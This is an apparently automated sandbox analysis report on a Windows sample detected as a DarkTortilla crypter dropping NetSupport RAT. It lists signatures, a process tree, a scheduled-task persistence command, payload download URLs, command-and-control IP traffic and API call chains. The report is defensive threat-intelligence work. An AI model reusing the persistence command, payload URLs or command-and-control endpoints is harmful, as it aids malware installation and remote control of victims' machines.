Windows Analysis Report
Jjv9ha2GKn.exe

Overview

General Information

Sample name: Jjv9ha2GKn.exe (renamed because original name is a hash value)
Original sample name: 6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0.exe
Analysis ID: 1572207
MD5: aedf7f67cf6d7f8ef348ba681046fe51
SHA1: 707ac1c67e2d569613c1b5cc3f809d6bd3cddc26
SHA256: 6ba3976f8956dceb2903dc89b9b66c3d81ceb93566b6244b58c4929a454815c0
Tags: DarkTortilla, exe, ganeres1-com, ganeres2-com, netsupport, user-JAMESWT_MHT

Detection

NetSupport RAT, DarkTortilla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to detect sleep reduction / modifications
Contains functionality to change the wallpaper
Delayed program exit found
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign process
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w10x64
  • Jjv9ha2GKn.exe (PID: 6512 cmdline: "C:\Users\user\Desktop\Jjv9ha2GKn.exe" MD5: AEDF7F67CF6D7F8EF348BA681046FE51)
    • AddInProcess32.exe (PID: 2972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • schtasks.exe (PID: 6308 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • client32.exe (PID: 828 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)
  • client32.exe (PID: 6044 cmdline: C:\Users\user\AppData\Local\DNScache\client32.exe MD5: 9497AECE91E1CCC495CA26AE284600B9)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
DarkTortilla | DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\DNScache\client32.exe | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Local\DNScache\pcicapi.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Local\DNScache\AudioCapture.dll | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(3 further entries not shown)

Source | Rule | Description | Author | Strings
00000009.00000002.2889855835.00000000111DC000.00000004.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000007.00000002.3301652835.00000000004D1000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(11 further entries not shown)

Source | Rule | Description | Author | Strings
9.2.client32.exe.6f6f0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
7.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
7.2.client32.exe.6ceb0000.5.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.0.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
9.2.client32.exe.400000.0.unpack | JoeSecurity_NetSupport | Yara detected NetSupport remote tool | Joe Security |
(14 further entries not shown)

                                System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 2972, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "DNScache" /tr "C:\Users\user\AppData\Local\DNScache\client32.exe" /RL HIGHEST, ProcessId: 6308, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T08:58:24.482566+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49831 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:26.643824+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49837 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:31.227150+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49851 | 23.254.224.41 | 443 | TCP
2024-12-10T08:58:33.561114+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49857 | 23.254.224.41 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-10T08:57:08.084054+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP
2024-12-10T08:58:37.212776+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP
2024-12-10T08:58:37.654624+0100 | 2827745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49865 | 88.210.12.58 | 3785 | TCP

                                AV Detection

Source: Jjv9ha2GKn.exe | Avira: detected
Source: https://cycleconf.com/dwnld/2nd2_4.zip | Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_1.zip | Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_2.zip | Avira URL Cloud: Label: phishing
Source: https://cycleconf.com/dwnld/2nd2_3.zip | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | ReversingLabs: Detection: 21%
Source: Jjv9ha2GKn.exe | ReversingLabs: Detection: 47%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Jjv9ha2GKn.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110AC600
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_110AC600 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,9_2_110AC600
Source: Jjv9ha2GKn.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | File opened: C:\Users\user\AppData\Local\DNScache\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: Jjv9ha2GKn.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000007.00000002.3304858661.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, client32.exe, 00000009.00000002.2890200975.000000006CDF1000.00000020.00000001.01000000.00000011.sdmp, msvcr100.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 00000007.00000002.3305095577.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, client32.exe, 00000009.00000002.2890449063.000000006F6F2000.00000002.00000001.01000000.0000000F.sdmp, PCICHEK.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, client32.exe, 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, PCICL32.DLL.4.dr
                                Source: Binary string: msauserext.pdbGCTL source: msauserext.dll.4.dr
                                Source: Binary string: mscpxl32.pdb source: mscpxl32.dLL.4.dr
                                Source: Binary string: mscpxl32.pdbGCTL source: mscpxl32.dLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.4.dr
                                Source: Binary string: mscat32.pdbGCTL source: mscat32.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_1.i386.pdb source: msvcp140_1.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.4.dr
                                Source: Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: msauserext.pdb source: msauserext.dll.4.dr
                                Source: Binary string: client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000007.00000002.3304754604.000000006CD80000.00000002.00000001.01000000.00000012.sdmp, HTCTL32.DLL.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000007.00000002.3305005916.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, client32.exe, 00000009.00000002.2890355521.000000006CEB5000.00000002.00000001.01000000.00000010.sdmp, pcicapi.dll.4.dr
                                Source: Binary string: mscat32.pdb source: mscat32.dll.4.dr
                                Source: Binary string: 0\1100\client32\Release\client32_ctr.pdb source: AddInProcess32.exe, 00000004.00000002.2880341312.000000000108F000.00000004.00000020.00020000.00000000.sdmp, client32.exe.4.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.4.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.4.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_0040F905 FindFirstFileExW,4_2_0040F905
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1102D1B3 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D1B3
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_11069760
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_11123690
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11108090 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_11108090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,7_2_110BC0E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1102CE84 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102CE84
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_11064EF0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE4EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE4EFE1
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE50F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50F84
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE4CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,7_2_6CE4CA9B
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE50B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50B33
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE4C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,7_2_6CE4C775
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_6CE50702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,7_2_6CE50702
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_1102CD90 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,9_2_1102CD90
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11069760 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,9_2_11069760
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11123690 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,9_2_11123690
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11108090 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,9_2_11108090
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_110BC0E0 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,9_2_110BC0E0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11064EF0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,9_2_11064EF0
Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 4x nop then add byte ptr [edi], dh 7_2_6CE08468

                                Networking

Source: Network traffic | Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.5:49865 -> 88.210.12.58:3785
Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 3785
Source: unknown | Network traffic detected: HTTP traffic on port 3785 -> 49865
Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 3785
Source: unknown | Network traffic detected: HTTP traffic on port 3785 -> 49865
Source: unknown | Network traffic detected: HTTP traffic on port 49865 -> 3785
Source: global traffic | TCP traffic: 192.168.2.5:49865 -> 88.210.12.58:3785
Source: global traffic | HTTP traffic detected: GET /dwnld/2nd2_1.zip HTTP/1.1 | Host: cycleconf.com
Source: global traffic | HTTP traffic detected: GET /dwnld/2nd2_2.zip HTTP/1.1 | Host: cycleconf.com
Source: global traffic | HTTP traffic detected: GET /dwnld/2nd2_3.zip HTTP/1.1 | Host: cycleconf.com
Source: global traffic | HTTP traffic detected: GET /dwnld/2nd2_4.zip HTTP/1.1 | Host: cycleconf.com
Source: global traffic | HTTP traffic detected: GET /location/loca.asp HTTP/1.1 | Host: geo.netsupportsoftware.com | Connection: Keep-Alive | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 104.26.0.231
Source: Joe Sandbox View | ASN Name: CITYLAN-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49831 -> 23.254.224.41:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49837 -> 23.254.224.41:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49857 -> 23.254.224.41:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49851 -> 23.254.224.41:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 4_2_004025B0 GetProcessHeap,InternetOpenW,InternetOpenUrlW,GetProcessHeap,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlReAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,4_2_004025B0
                                Source: global trafficDNS traffic detected: DNS query: cycleconf.com
                                Source: global trafficDNS traffic detected: DNS query: ganeres1.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 88.210.12.58Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: unknown | HTTPS traffic detected: 23.254.224.41:443 -> 192.168.2.5:49831 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11032870 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_1101F350 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11032870 GetClipboardFormatNameA,SetClipboardData
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11031B70 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_110076F0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 7_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: C:\Users\user\AppData\Local\DNScache\client32.exe | Code function: 9_2_11110930 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState
                                Source: Yara match | File source: 7.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.111b32a0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 9.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara match | File source: 00000009.00000002.2889815261.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 828, type: MEMORYSTR
                                Source: Yara match | File source: Process Memory Space: client32.exe PID: 6044, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\DNScache\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

